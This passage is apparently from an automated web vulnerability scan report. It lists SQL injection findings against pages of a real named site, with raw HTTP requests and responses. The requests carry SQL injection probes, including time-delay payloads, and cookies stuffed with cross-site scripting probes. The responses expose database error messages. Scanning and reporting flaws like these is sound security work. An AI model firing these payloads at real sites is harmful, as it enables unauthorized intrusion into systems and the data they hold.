OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:56:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=71p64m0b5oqkc1r4vv0vsov887; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=' at line 5

1.106. http://www.insideup.com/ppc/leadflow/caad00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00'/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:56:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qs9e5rv5h5dcpvp8q40klf6qh5; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=' at line 5

1.107. http://www.insideup.com/ppc/leadflow/caad00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00'/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow/caad00''/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:24:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00''/project.php was not found on this server.</p>

1.108. http://www.insideup.com/ppc/leadflow/caad00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php'?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php''?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:24:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project.php'' was not found on this server.</p>

1.109. http://www.insideup.com/ppc/leadflow/caad00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php'?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:56:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5chdb3fjimm90dn00014q15u32; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=' at line 5

1.110. http://www.insideup.com/ppc/leadflow/caad00/project.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; 